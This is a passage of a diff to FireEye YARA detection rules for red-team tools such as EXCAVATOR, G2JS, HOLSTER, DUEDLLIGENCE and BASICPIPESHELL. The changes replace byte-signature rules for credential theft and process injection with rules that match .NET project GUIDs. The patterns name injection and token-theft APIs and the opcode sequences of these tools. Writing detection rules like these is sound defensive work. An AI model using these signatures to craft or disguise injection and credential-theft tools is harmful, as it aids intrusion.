+		$b64_mz
 }
-rule FIREEYE_RT_Credtheft_Win_EXCAVATOR_1 : FILE
+rule FIREEYE_RT_Builder_MSIL_G2JS_1 : FILE
 {
 	meta:
-		description = "This rule looks for the binary signature of the 'Inject' method found in the main Excavator PE."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the Gadget2JScript project."
 		author = "FireEye"
-		id = "7cabc230-e55b-5096-996a-b6a8c9693bdc"
+		id = "484202c2-ac7d-5e6c-8bf1-3452a357c668"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/production/yara/CredTheft_Win_EXCAVATOR_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Builder_MSIL_G2JS_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f7d9961463b5110a3d70ee2e97842ed3"
-		logic_hash = "bf4b776f34a1a9aa5438504f63a63ef452a747363de3b70cec52145d777055bd"
+		hash = "fa255fdc88ab656ad9bc383f9b322a76"
+		logic_hash = "487d8e8deef218412f241d99ce32b63bfeb3568d23048b9dd4afff8f401bfea5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 4
+		rev = 2
 
 	strings:
-		$bytes1 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 20 01 00 00 48 8B 05 75 BF 01 00 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 8D 0D 12 A1 01 00 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 00 FF 15 CB 1F 01 00 48 85 C0 75 1B FF 15 80 1F 01 00 8B D0 48 8D 0D DF A0 01 00 E8 1A FF FF FF 33 C0 E9 B4 02 00 00 48 8D 15 D4 A0 01 00 48 89 9C 24 30 01 00 00 48 8B C8 FF 15 4B 1F 01 00 48 8B D8 48 85 C0 75 19 FF 15 45 1F 01 00 8B D0 48 8D 0D A4 A0 01 00 E8 DF FE FF FF E9 71 02 00 00 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 45 66 66 0F 1F 84 00 00 00 00 00 48 8B 4C 24 60 FF 15 4D 1F 01 00 3B C6 74 22 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 D1 EB 0A 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A0 01 00 48 8D 05 A6 C8 01 00 B9 C8 05 00 00 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 B2 FF 15 CC 1E 01 00 4C 8D 44 24 78 BA 0A 00 00 00 48 8B C8 FF 15 01 1E 01 00 85 C0 0F 84 66 01 00 00 48 8B 4C 24 78 48 8D 45 80 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 D8 1D 01 00 85 C0 0F 84 35 01 00 00 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 50 01 FF 15 5C 1E 01 00 FF 15 06 1E 01 00 4C 8B 44 24 68 33 D2 48 8B C8 FF 15 DE 1D 01 00 48 8B F8 48 85 C0 0F 84 FF 00 00 00 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 50 01 FF 15 25 1E 01 00 85 C0 0F 84 E2 00 00 00 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 6C 1D 01 00 85 C0 0F 84 B1 00 00 00 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C 8D 05 58 39 03 00 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 44 24 30 04 00 08 00 44 89 74 24 28 4C 89 74 24 20 FF 15 0C 1D 01 00 85 C0 74 65 48 8B 4C 24 70 8B 5D 98 FF 15 1A 1D 01 00 48 8B 4D 88 FF 15 10 1D 01 00 48 8B 4D 90 FF 15 06 1D 01 00 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 4E 1D 01 00 48 8B D8 48 85 C0 74 2B 48 8B C8 E8 4E 06 00 00 48 85 C0 74 1E BA FF FF FF FF 48 8B C8 FF 15 3B 1D 01 00 48 8B CB FF 15 CA 1C 01 00 B8 01 00 00 00 EB 24 FF 15 DD 1C 01 00 8B D0 48 8D 0D 58 9E 01 00 E8 77 FC FF FF 48 85 FF 74 09 48 8B CF FF 15 A9 1C 01 00 33 C0 48 8B 9C 24 30 01 00 00 48 8B 4D 10 48 33 CC E8 03 07 00 00 4C 8D 9C 24 20 01 00 00 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
-		$bytes2 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
-		$bytes3 = { 48 89 74 24 10 48 89 7C 24 18 4C 89 74 24 20 55 48 8D 6C 24 E0 48 81 EC 2? ?1 ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 33 C4 48 89 45 10 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 60 48 ?? ?? ?? ?? ?? ?? 4C 89 74 24 68 0F 11 45 A0 41 8B FE 4C 89 74 24 70 0F 11 45 B0 0F 11 45 C0 0F 11 45 D0 0F 11 45 E0 0F 11 45 F0 0F 11 45 ?? FF ?? ?? ?? ?? ?? 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 89 9C 24 3? ?1 ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 75 ?? 66 66 0F 1F 84 ?? ?? ?? ?? ?? 48 8B 4C 24 60 FF ?? ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 60 48 8D 44 24 60 45 33 C9 48 89 44 24 20 45 33 C0 BA ?? ?? ?? ?? FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 60 48 89 44 24 70 66 0F 6F 15 6D A? ?1 ?? 48 ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 90 F3 0F 6F 40 F0 48 8D 40 40 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 B0 66 0F 6F CA F3 0F 6F 40 C0 66 0F EF C8 F3 0F 7F 48 C0 66 0F 6F CA F3 0F 6F 40 D0 66 0F EF C8 F3 0F 7F 48 D0 F3 0F 6F 40 E0 66 0F EF C2 F3 0F 7F 40 E0 48 83 E9 01 75 ?? FF ?? ?? ?? ?? ?? 4C 8D 44 24 78 BA 0A ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 78 48 8D 45 80 41 B9 02 ?? ?? ?? 48 89 44 24 28 45 33 C0 C7 44 24 2? ?2 ?? ?? ?? 41 8D 51 09 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 33 C9 41 8D 5? ?1 FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 4C 8B 44 24 68 33 D2 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 68 48 8B C8 41 8D 5? ?1 FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 30 4C 8D 4C 24 70 4C 89 74 24 28 33 D2 41 ?? ?? ?? ?? ?? 48 C7 44 24 2? ?8 ?? ?? ?? 48 8B CF FF ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D 80 48 8D 45 88 48 89 44 24 50 4C ?? ?? ?? ?? ?? ?? 48 8D 45 A0 48 89 7D 08 48 89 44 24 48 45 33 C9 4C 89 74 24 40 33 D2 4C 89 74 24 38 C7 ?? ?? ?? ?? ?? ?? ?? 44 89 74 24 28 4C 89 74 24 20 FF ?? ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 70 8B 5D 98 FF ?? ?? ?? ?? ?? 48 8B 4D 88 FF ?? ?? ?? ?? ?? 48 8B 4D 90 FF ?? ?? ?? ?? ?? 44 8B C3 33 D2 B9 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA ?? ?? ?? ?? 48 8B C8 FF ?? ?? ?? ?? ?? 48 8B CB FF ?? ?? ?? ?? ?? B8 01 ?? ?? ?? EB ?? FF ?? ?? ?? ?? ?? 8B D0 48 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF ?? ?? ?? ?? ?? 33 C0 48 8B 9C 24 3? ?1 ?? ?? 48 8B 4D 10 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 2? ?1 ?? ?? 49 8B 73 18 49 8B 7B 20 4D 8B 73 28 49 8B E3 5D C3 }
-		$bytes4 = { 48 89 74 24 ?? 48 89 7C 24 ?? 4C 89 74 24 ?? 55 48 8D 6C 24 ?? 48 81 EC 20 01 00 00 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 45 ?? 0F 57 C0 45 33 F6 8B F1 4C 89 74 24 ?? 48 8D 0D ?? ?? ?? ?? 4C 89 74 24 ?? 0F 11 45 ?? 41 8B FE 4C 89 74 24 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 75 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 3B C6 74 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 BA 00 00 00 02 FF D3 85 C0 74 ?? EB ?? 48 8B 44 24 ?? 48 89 44 24 ?? 66 0F 6F 15 ?? ?? 01 00 48 8D 05 ?? ?? ?? ?? B9 C8 05 00 00 90 F3 0F 6F 40 ?? 48 8D 40 ?? 66 0F 6F CA 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? 66 0F 6F CA F3 0F 6F 40 ?? 66 0F EF C8 F3 0F 7F 48 ?? F3 0F 6F 40 ?? 66 0F EF C2 F3 0F 7F 40 ?? 48 83 E9 01 75 ?? FF 15 ?? ?? ?? ?? 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 45 ?? 41 B9 02 00 00 00 48 89 44 24 ?? 45 33 C0 C7 44 24 ?? 02 00 00 00 41 8D 51 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B 44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ?? ?? 45 33 C0 4C 8D 4C 24 ?? 48 8B C8 41 8D 50 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 4C 89 74 24 ?? 4C 8D 4C 24 ?? 4C 89 74 24 ?? 33 D2 41 B8 00 00 02 00 48 C7 44 24 ?? 08 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 45 ?? 48 89 44 24 ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 45 ?? 48 89 7D ?? 48 89 44 24 ?? 45 33 C9 4C 89 74 24 ?? 33 D2 4C 89 74 24 ?? C7 44 24 ?? 04 00 08 00 44 89 74 24 ?? 4C 89 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? 8B 5D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 48 8B 4D ?? FF 15 ?? ?? ?? ?? 44 8B C3 33 D2 B9 3A 04 00 00 FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8B C8 E8 ?? ?? ?? ?? 48 85 C0 74 ?? BA FF FF FF FF 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? FF 15 ?? ?? ?? ?? 8B D0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 73 ?? 49 8B 7B ?? 4D 8B 73 ?? 49 8B E3 5D C3 }
+		$typelibguid1 = "AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9" ascii nocase wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of ( $bytes* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_Trojan_Win64_Generic_23 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_HOLSTER_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the a customized version of the 'DUEDLLIGENCE' project."
 		author = "FireEye"
-		id = "470bfeed-e000-58c6-b115-dfa8aea25bef"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "e1e8979e-2dee-5061-a11d-00dcfba476c3"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_23.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/HackTool_MSIL_HOLSTER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "b66347ef110e60b064474ae746701d4a"
-		logic_hash = "4c1860801b26abbab8c4aea730bf69f388c902083b9945e11e6782af3ab22789"
+		hash = "a91bf61cc18705be2288a0f6f125068f"
+		logic_hash = "bc254a1ab71f2a6092f139ce5a85347a7a4976f963603ffbbebb9b0d6ce6573c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$api1 = "VirtualAllocEx" fullword
-		$api2 = "UpdateProcThreadAttribute" fullword
-		$api3 = "DuplicateTokenEx" fullword
-		$api4 = "CreateProcessAsUserA" fullword
-		$inject = { 8B 85 [4] C7 44 24 20 40 00 00 00 41 B9 00 30 00 00 44 8B C0 33 D2 48 8B 8D [4] FF 15 [4] 48 89 45 ?? 48 83 7D ?? 00 75 ?? 48 8B 45 ?? E9 [4] 8B 85 [4] 48 C7 44 24 20 00 00 00 00 44 8B C8 4C 8B 85 [4] 48 8B 55 ?? 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? 48 8B 45 ?? EB ?? 8B 85 [4] 48 8B 4D ?? 48 03 C8 48 8B C1 48 89 45 48 48 8D 85 [4] 48 89 44 24 30 C7 44 24 28 00 00 00 00 48 8B 85 [4] 48 89 44 24 20 4C 8B 4D ?? 41 B8 00 00 10 00 33 D2 48 8B 8D [4] FF 15 }
-		$process = { 48 C7 44 24 30 00 00 00 00 48 C7 44 24 28 00 00 00 00 48 C7 44 24 20 08 00 00 00 4C 8D 8D [4] 41 B8 00 00 02 00 33 D2 48 8B 8D [4] FF 15 [4] 85 C0 75 ?? E9 [4] 48 8B 85 [4] 48 89 85 [4] 48 8D 85 [4] 48 89 44 24 50 48 8D 85 [4] 48 89 44 24 48 48 C7 44 24 40 00 00 00 00 48 C7 44 24 38 00 00 00 00 C7 44 24 30 04 00 08 00 C7 44 24 28 00 00 00 00 48 C7 44 24 20 00 00 00 00 45 33 C9 4C 8D 05 [4] 33 D2 48 8B [2-5] FF 15 }
-		$token = { FF 15 [4] 4C 8D 45 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 75 ?? E9 [4] 48 8D [2-5] 48 89 44 24 28 C7 44 24 20 02 00 00 00 41 B9 02 00 00 00 45 33 C0 BA 0B 00 00 00 48 8B 4D ?? FF 15 [4] 85 C0 75 ?? E9 [4] 4C 8D 8D [4] 45 33 C0 BA 01 00 00 00 33 C9 FF 15 }
+		$typelibguid1 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Trojan_Win64_Generic_22 : FILE
+rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "e79661a8-5254-5e8e-b92b-edf1ddb072ff"
-		date = "2020-11-26"
-		date = "2020-11-26"
-		modified = "2020-12-09"
+		id = "d438575f-3cb2-5cff-b5d4-733044f62e61"
+		date = "2020-12-18"
+		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/EXCAVATOR/supplemental/yara/Trojan_Win64_Generic_22.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_1.yar#L5-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "f7d9961463b5110a3d70ee2e97842ed3"
-		logic_hash = "52fbe5c0ee7c05df5fcd62c26caaa5498e32352da9c5940e522aa31d6c808028"
+		logic_hash = "56237d686b954950849adeedc87d5f9fbff2335a0ff033ba8571b3e3b93f587c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 2
 
 	strings:
-		$api1 = "VirtualAllocEx" fullword
-		$api2 = "UpdateProcThreadAttribute" fullword
-		$api3 = "DuplicateTokenEx" fullword
-		$api4 = "CreateProcessAsUserA" fullword
-		$inject = { C7 44 24 20 40 00 00 00 33 D2 41 B9 00 30 00 00 41 B8 [4] 48 8B CB FF 15 [4] 48 8B F0 48 85 C0 74 ?? 4C 89 74 24 20 41 B9 [4] 4C 8D 05 [4] 48 8B D6 48 8B CB FF 15 [4] 85 C0 75 [5-10] 4C 8D 0C 3E 48 8D 44 24 ?? 48 89 44 24 30 44 89 74 24 28 4C 89 74 24 20 33 D2 41 B8 [4] 48 8B CB FF 15 }
-		$process = { 89 74 24 30 ?? 8D 4C 24 [2] 89 74 24 28 33 D2 41 B8 00 00 02 00 48 C7 44 24 20 08 00 00 00 48 8B CF FF 15 [4] 85 C0 0F 84 [4] 48 8B [2-3] 48 8D 45 ?? 48 89 44 24 50 4C 8D 05 [4] 48 8D 45 ?? 48 89 7D 08 48 89 44 24 48 45 33 C9 ?? 89 74 24 40 33 D2 ?? 89 74 24 38 C7 44 24 30 04 00 08 00 [0-1] 89 74 24 28 ?? 89 74 24 20 FF 15 }
-		$token = { FF 15 [4] 4C 8D 44 24 ?? BA 0A 00 00 00 48 8B C8 FF 15 [4] 85 C0 0F 84 [4] 48 8B 4C 24 ?? 48 8D [2-3] 41 B9 02 00 00 00 48 89 44 24 28 45 33 C0 C7 44 24 20 02 00 00 00 41 8D 51 09 FF 15 [4] 85 C0 0F 84 [4] 45 33 C0 4C 8D 4C 24 ?? 33 C9 41 8D 50 01 FF 15 }
+		$create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A }
+		$iz1 = /_Cor(Exe|Dll)Main/ fullword
+		$suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 }
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Backdoor_PS1_BASICPIPESHELL_1
+rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "8f85d6cc-fd1e-5bf3-8052-440cbeda0ac9"
+		id = "b10b476a-0d38-53e4-80cf-559618729268"
 		date = "2020-12-18"
 		modified = "2020-12-18"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BASICPIPESHELL/production/yara/APT_Backdoor_PS1_BASICPIPESHELL_1.yar#L5-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_2.yar#L5-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "7a9f0002055ffe826562cab3d02d8babd14c5fcd6d0b528a2988e2649034279d"
+		logic_hash = "5a2e0559e3b47c1957a42929fbbeba7a53c21619125381b01dcd8453b6ec4802"
 		score = 75
-		quality = 63
-		tags = ""
+		quality = 75
+		tags = "FILE"
 
 	strings:
